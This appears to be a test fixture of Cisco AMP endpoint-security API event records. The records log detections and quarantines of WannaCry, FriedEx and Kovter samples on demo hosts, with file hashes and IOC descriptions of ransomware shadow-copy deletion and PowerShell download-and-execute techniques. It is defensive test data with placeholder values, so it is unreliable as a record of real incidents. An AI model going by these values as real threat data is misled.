+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}}
